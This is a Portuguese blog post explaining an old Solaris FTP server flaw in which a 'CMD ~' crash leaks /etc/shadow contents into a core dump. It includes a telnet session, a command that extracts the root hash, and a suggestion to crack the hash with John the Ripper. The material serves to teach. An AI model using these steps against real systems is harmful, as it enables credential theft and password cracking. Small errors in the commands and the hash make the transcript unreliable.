O servidor FTP distribuido nas versões mais antigas do Solaris era conhcido por colocar partes do /etc/shadow
no seu arquivo core quando forçado a travar utilizando o seguinte comando:
CMD ~
Depois de travar o processor do servidor FTP utilizando esse comando, o invasor pode obter o arquivo core que sofreu dump a fim de obter partes do arquivo /etc/shadow. Eis uma sessão de exemplo que tenta fazer isso:
$ telnet 127.0.0.1 21
Trying 127.0.0.1 . . .
Connected to 127.0.0.1.
Escape character is '^]'.
220 127.0.0.1 FTO Server (SunOS 5.6) ready
user joe << INVENTADO
331 Password required for joe
pass wrongpassword << INVENTADO
530 Login incorrect.
CMD ~
530 Please Login with USER and PASS.
Connection closed by foreign host.
$ string /core | grep root
root:1$PykbWI8k$bcKLz7CBPbsPHxUcHLnoql:12141:0:99999:7:::
Depois que um invasor tem acesso ao hash de senha do usuário root, ele pode utilizar um ferramentada como John the ripper para quebrar a senha com um ataque de força bruta.
Assinar:
Postar comentários (Atom)
Um comentário:
outro ótimo artigo...
vlw, aprendi bastante com o seu blog :b
Postar um comentário